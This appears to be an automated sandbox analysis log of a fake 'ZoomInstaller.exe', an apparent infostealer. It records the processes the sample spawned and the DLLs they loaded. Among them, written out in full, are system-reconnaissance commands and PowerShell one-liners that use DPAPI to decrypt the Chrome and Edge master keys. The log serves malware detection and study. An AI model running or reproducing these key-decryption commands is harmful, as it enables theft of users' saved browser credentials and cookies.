bufferecb85da208ccedcda3abcbadadfb5fb91423cc98009cc670a9423fd9472b78d5727fbdb18cad2624ace4f40c34ea4b25ed4f06096b5e8cbf70c74380253b0ce5babaf95cd02b767d868ff87e042ab8ab4a2ab596c8cb97fa4249cd843fe7bc726f1bef30912dbabb142ff299crypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0name %q does not begin with a lettersql: converting argument %s type: %wconverting NULL to %s is unsupportedjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after
Source: ZoomInstaller.exe String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: ZoomInstaller.exe String found in binary or memory: -stopTimer
Source: ZoomInstaller.exe String found in binary or memory: -addr
Source: ZoomInstaller.exe String found in binary or memory: -stop
Source: unknown Process created: C:\Users\user\Desktop\ZoomInstaller.exe "C:\Users\user\Desktop\ZoomInstaller.exe"
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\tasklist.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\tasklist.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
